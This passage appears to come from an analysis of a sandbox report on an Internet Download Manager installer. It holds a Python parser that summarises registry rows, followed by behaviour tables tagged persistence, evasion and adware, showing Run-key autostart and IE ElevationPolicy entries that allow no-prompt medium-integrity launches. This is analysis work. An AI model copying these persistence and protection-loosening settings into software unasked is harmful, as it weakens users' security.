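Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Windows\CurrentVersion\Run\IDMan = "C:\\Program Files (x86)\\Internet Download Manager\\IDMan.exe /onboot" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{0055C089-8582-441B-A0BF-17B458C2A3A8}\ = "IDM Helper" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
"""

ROW_RE = re.compile(
    r'^(?P<op>Set value \(\w+\)|Key created|Key deleted) '
    r'(?P<path>\\REGISTRY\\.*?)'
    r'(?: = "(?P<value>.*)")?'
    r' (?P<proc>[A-Za-z]:\\.*?) N/A$'
)
GUID = r"(\{[0-9A-Fa-f-]{36}\})"
CLSID_RE = re.compile(r"\\CLSID\\" + GUID + r"\\InprocServer32$", re.I)  # case-insensitive: InProcServer32 too
BHO_RE = re.compile(r"\\Browser Helper Objects\\" + GUID + "$", re.I)
RUN_RE = re.compile(r"\\CurrentVersion\\(Run|RunOnce)$", re.I)
ELEV_RE = re.compile(r"\\Low Rights\\ElevationPolicy\\" + GUID + "$", re.I)
# IE Protected Mode 'Policy' codes for Low Rights\ElevationPolicy entries.
ELEVATION_POLICY = {"0": "launch blocked", "1": "launch at low integrity, no prompt",
                    "2": "prompt, then launch at medium integrity",
                    "3": "launch at medium integrity, no prompt"}


def parse_rows(text):
    """Yield (op, path, value, proc) per table row; lines that do not parse are skipped."""
    for line in text.splitlines():
        m = ROW_RE.match(line.strip())
        if m:
            value = m.group("value")
            if value is not None:
                value = value.replace("\\\\", "\\")  # the report escapes backslashes in values
            yield m.group("op"), m.group("path"), value, m.group("proc")


def replay(rows):
    """Apply rows in order; return {lower-cased key path: entry}."""
    keys = {}

    def touch(path, proc):
        e = keys.setdefault(path.lower(), {"path": path, "values": {}, "writers": set(), "live": True})
        if not e["live"]:  # re-created after a delete: the key starts out empty again
            e.update(values={}, live=True)
        e["writers"].add(proc)
        return e

    for op, path, value, proc in rows:
        if op == "Key created":
            touch(path, proc)
        elif op == "Key deleted":  # deleting a key takes its subkeys with it; values kept for reporting
            for norm, e in keys.items():
                if norm == path.lower() or norm.startswith(path.lower() + "\\"):
                    e["live"] = False
                    e["writers"].add(proc)
        else:  # Set value: last path component is the value name, '' meaning the default value
            key, _, name = path.rpartition("\\")
            touch(key, proc)["values"][name or "(Default)"] = value
    return keys


def summarize(text):
    """Final COM, BHO, Run and ElevationPolicy state after replaying the rows."""
    com, bho, run, elev = {}, {}, [], {}
    for e in replay(parse_rows(text)).values():
        path, v = e["path"], e["values"]
        if (m := CLSID_RE.search(path)):
            com[m.group(1).upper()] = {"dll": v.get("(Default)"), "threading": v.get("ThreadingModel"),
                                       "live": e["live"], "writers": sorted(e["writers"])}
        elif (m := BHO_RE.search(path)):
            bho[m.group(1).upper()] = {"name": v.get("(Default)")}
        elif (m := RUN_RE.search(path)):
            run.extend((m.group(1), n, val) for n, val in v.items())
        elif (m := ELEV_RE.search(path)):
            elev[m.group(1).upper()] = {"app": v.get("AppName"), "path": v.get("AppPath"),
                                        "policy": ELEVATION_POLICY.get(v.get("Policy"), "unknown")}
    for guid, info in bho.items():  # a BHO is loaded through its CLSID's InprocServer32 DLL
        info["dll"] = com.get(guid, {}).get("dll")
    return {"com": com, "bho": bho, "run": sorted(run), "elevation": elev}


if __name__ == "__main__":
    print(json.dumps(summarize(ROWS), indent=2))
```

Run as a script it prints the summary as JSON; paste in the full tables (including the Wow6432Node BHO rows and the remaining ElevationPolicy and DragDrop rows) to get the complete picture. In the sample, {5312C54E-...} comes out with live = false because its last row in report order is a Key deleted, while {7D11E719-...} and the IDM Helper BHO survive.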

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\Internet Download Manager\IDMVMPrs.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_style_3.tbi C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IEMonitor.exe C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_ar.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_iw.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_al.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMOpExt.nex C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IEExt.htm C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmbrbtn64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_fa.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\MediumILStart.exe C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_hu.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmwfp32.sys C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_bg.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_vn.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_gu.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_mn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_vn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_bn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_it.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmmzcc.xpi C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_ru.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_cht.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_gr.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_hi.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_dk.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File opened for modification C:\Program Files (x86)\Internet Download Manager\IDMSetup2.log C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\grabber.chm C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_tr.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmvs.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_jp.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_jp.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\tutor.chm C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmwfp.inf C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMShellExt64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_iw.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_sw.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_my.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\license.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_it.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Toolbar\3d_large_3.bmp C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_sk.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_vn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\downlWithIDM64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_pt.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmmzcc7_64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_jp.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\libcrypto.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Brotli-license.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmcchandler2_64.dll C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_fa.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMIntegrator64.exe C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_kr.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_pt.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\idm_mn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmantypeinfo.tlb C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\tips_pl.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\IDMGetAll64.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_de.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmindex.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_chn.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\Languages\inst_pl.lng C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\idmmzcc7.dll C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
File created C:\Program Files (x86)\Internet Download Manager\tips.txt C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A
File opened for modification C:\Windows\WindowsUpdate.log C:\Windows\system32\wuapp.exe N/A
File opened for modification C:\Windows\INF\setupapi.app.log C:\Windows\system32\RUNDLL32.EXE N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\System32\sc.exe N/A
N/A N/A C:\Windows\System32\sc.exe N/A

Enumerates physical storage devices

Checks processor information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Configuration Data C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Windows\SysWOW64\reg.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Windows\SysWOW64\reg.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\system32\runonce.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Component Information C:\Windows\SysWOW64\reg.exe N/A
Key value enumerated \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\CurrentPatchLevel C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz C:\Program Files\Mozilla Firefox\firefox.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\FeatureSet C:\Windows\SysWOW64\reg.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Windows\SysWOW64\reg.exe N/A
Key opened \Registry\Machine\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Windows\system32\runonce.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A
N/A N/A C:\Windows\SysWOW64\schtasks.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A
N/A N/A C:\Windows\System32\tasklist.exe N/A

Kills process with taskkill

evasion
Description Indicator Process Target
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A
N/A N/A C:\Windows\System32\taskkill.exe N/A

Modifies Internet Explorer Phishing Filter

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PhishingFilter C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\PhishingFilter\ClientSupported_MigrationTime = 10946889138eda01 C:\Program Files\Internet Explorer\iexplore.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\TabbedBrowsing\NewTabPage\MFV = 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 C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\ C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\MACHINE\Software\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{15B851AF-A4B9-43EF-97D3-28E1B4A5DB9B}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\idmBroker.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppPath = "C:\\Program Files (x86)\\Internet Download Manager" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\AppName = "IDMan.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\DownloadUI = "{7D11E719-FF90-479C-B0D7-96EB43EE55D7}" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\SearchScopes C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\MACHINE\SOFTWARE\Wow6432Node\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\InternetRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\FullScreen = "no" C:\Program Files\Internet Explorer\iexplore.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy C:\Users\Admin\AppData\Local\Temp\IDM_Setup_Temp\IDM1.tmp N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Recovery\AdminActive C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\AppName = "IEMonitor.exe" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\MenuExt\Download with IDM C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Program Files\Internet Explorer\iexplore.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\DragDrop\{19129CDA-AFC0-4330-99BC-C5A834F89006} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4} C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{E0DACC63-037F-46EE-AC02-E4C7B0FBFEB4}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\Low Rights\ElevationPolicy\{1902485B-CE75-42C1-BA2D-57E660793D9A}\Policy = "3" C:\Program Files (x86)\Internet Download Manager\IDMan.exe N/A
Key created \REGISTRY\USER\S-1-5-21-3452737119-3959686427-228443150-1000\Software\Microsoft\Internet Explorer\LowRegistry C:\Program Files\Internet Explorer\iexplore.exe N/A
